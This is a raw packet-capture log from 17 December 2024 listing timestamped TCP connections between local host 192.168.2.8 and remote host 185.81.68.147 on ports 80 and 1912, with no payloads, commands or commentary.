                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.920396090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.920408010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.920608997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.921205997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.921366930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.921466112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.922238111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.922302961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.923253059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.923264027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.923300028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.924103975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.924175024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.924206018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.924987078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.925515890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.925888062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.925951958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.932583094 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.947854996 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:14.070826054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:14.244246960 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:14.250236034 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:14.370101929 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:14.484441996 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:14.604228020 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:14.604371071 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:14.604423046 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:14.690470934 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:14.724431038 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:14.738521099 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:14.814311028 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:14.937493086 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.263042927 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.314296961 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.438304901 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.752595901 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.752693892 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.752764940 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.757165909 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.757333040 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.757587910 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.765361071 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.816623926 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930721045 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930743933 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930757046 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930769920 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930793047 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930805922 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930821896 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930824041 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930838108 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930860043 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930860043 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930883884 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.931005001 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.931085110 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.931371927 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.035094023 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.051835060 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.051872015 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.051981926 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.122751951 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.122792959 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.122978926 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.125169992 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.125236988 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.125283957 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.133658886 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.133675098 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.133728981 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.141973972 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.142030954 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.142086029 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.150520086 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.150537014 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.150583029 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.154860020 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.158845901 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.158865929 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.158921003 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.167386055 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.167406082 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.167460918 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.175643921 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.175726891 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.175796032 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.184042931 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.184170008 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.184242964 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.192516088 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.192647934 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.192708015 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.200974941 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.201109886 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.201170921 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.244354010 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.244373083 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.244443893 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.248327971 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.301027060 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.315001011 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.315042973 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.315095901 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.317482948 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.317578077 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.317617893 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.322319984 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.324237108 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.324306011 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.324364901 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.329052925 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.329071045 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.329122066 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.334052086 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.334140062 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.334170103 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.338891983 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.338995934 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.339046955 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.343729973 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.343806982 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.343830109 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.348576069 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.348603964 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.348651886 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.353396893 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.353430033 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.353444099 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.358310938 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.358355999 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.358489037 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.363141060 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.363185883 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.363204002 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.367887020 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.367933035 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.367947102 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.372742891 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.372793913 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.372802973 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.377871990 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.377887964 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.377929926 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.381443977 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.381493092 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.381550074 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.385451078 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.385514021 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.385639906 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.389281034 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.389322042 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.389329910 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.393246889 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.393270969 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.393294096 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.397203922 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.397259951 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.397383928 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.400952101 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.401026964 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.401196003 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.422069073 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.422107935 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.422194004 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.482945919 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.503808022 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.507505894 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.507527113 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.507587910 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.508711100 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.508861065 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.508913040 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.511754990 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.511809111 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.511862040 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.514661074 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.514889956 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.514945030 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.517673969 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.517760038 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.517801046 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.520714998 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.520730019 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.521092892 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.523375034 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.523534060 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.523590088 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.526134014 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.526288033 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.526328087 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.528994083 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.529084921 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.529140949 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.531696081 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.531805038 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.531851053 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.534229040 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.534322023 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.534372091 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.537698030 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.537714958 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.537772894 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.539612055 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.539796114 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.539834023 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.542259932 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.542335033 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.542392015 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.545113087 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.545177937 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.545294046 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.548016071 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.548119068 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.548171997 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.550440073 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.550532103 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.550570011 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.553330898 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.553472996 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.553522110 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.556075096 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.556153059 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.556199074 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.558351040 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.558461905 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.558505058 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.561013937 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.561060905 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.561141014 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.563746929 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.563846111 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.564083099 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.566472054 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.566657066 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.566750050 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.569107056 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.569139957 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.569308043 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.571727037 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.571799040 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.571861982 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.574398041 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.574632883 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.574681997 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.577161074 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.577177048 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.577224970 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.579850912 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.579922915 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.579979897 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.582500935 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.582602978 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.582659006 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.585294962 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.585391045 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.585495949 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.587826014 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.587904930 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.587963104 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.590506077 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.590612888 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.590656042 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.593178034 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.593244076 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.593360901 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.595901012 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.595943928 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.595989943 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.598553896 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.598577023 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.598623037 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.601227045 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.601397038 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.601444006 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.624499083 CET191249710185.81.68.147192.168.2.8
